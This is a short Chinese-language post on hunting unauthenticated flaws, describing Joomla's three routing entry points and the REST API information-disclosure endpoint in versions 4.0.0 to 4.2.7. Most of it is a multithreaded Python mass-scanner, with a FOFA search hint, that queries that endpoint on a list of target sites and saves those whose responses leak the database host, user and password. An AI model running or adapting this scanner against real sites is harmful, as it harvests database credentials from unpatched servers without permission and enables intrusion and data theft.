挖掘未授权漏洞的思路:
Wordpress/RounderCube 还是 PhpMyAdmin 以及一些知名度比较高的 php 应用(一个 Java 安全研究员感到头皮发麻),我的重点对象变成了请求路由的代码追踪,一旦分析经过路由选择之后,剩下的业务代码我是完全不看了。
Joomla 大致有三个路由入口,分别是
- 根目录的 index.php(用户访问文章)
- 根目录的 administrator/index.php(管理员管理)
- 根目录的 api/index.php(开发者爱好的 Rest API)
未授权的接口正是第三个入口。Joomla4.0.0——Joomla4.2.7(Rest API 4.x 正式开发)
http://127.0.0.1/api/index.php/v1/config/application?public=true
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
|
# fofa:product="Joomla"
from queue import Queue
from threading import Thread, Lock
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
BASE_URL = "/api/index.php/v1/config/application?public=true"
def write_Result(url):
with open("resuslt.txt", "a", encoding="utf-8") as f:
f.write(url + "\n")
def ReadFile(fQueue: Queue):
# self.file = 要读取的文本
# 当前测试为静态路径
with open(r"text.txt", 'r', encoding='utf-8') as file:
for file in file.readlines():
f = file.replace("\n", '') + BASE_URL
fQueue.put(f)
class A(Thread):
def __init__(self, a):
super(A, self).__init__()
self.queue = a
self.setDaemon(True)
def run(self) -> None:
try:
# print(url)
response = requests.get(self.queue, verify=False)
# print("URL:{} STATUS:{}".format(response.url, response.status_code))
if response.status_code == 200 and response.text.find("host") != -1 and response.text.find("user") != -1 and response.text.find("password") != -1:
write_Result(self.queue)
print("URL:{} STATUS:{}".format(response.url, response.status_code))
except Exception as e:
pass
q = Queue()
ReadFile(q)
while True:
url = q.get()
A(url).start()
if q.empty():
break
|
参考文章:https://xz.aliyun.com/t/12175
文章备份:GitHub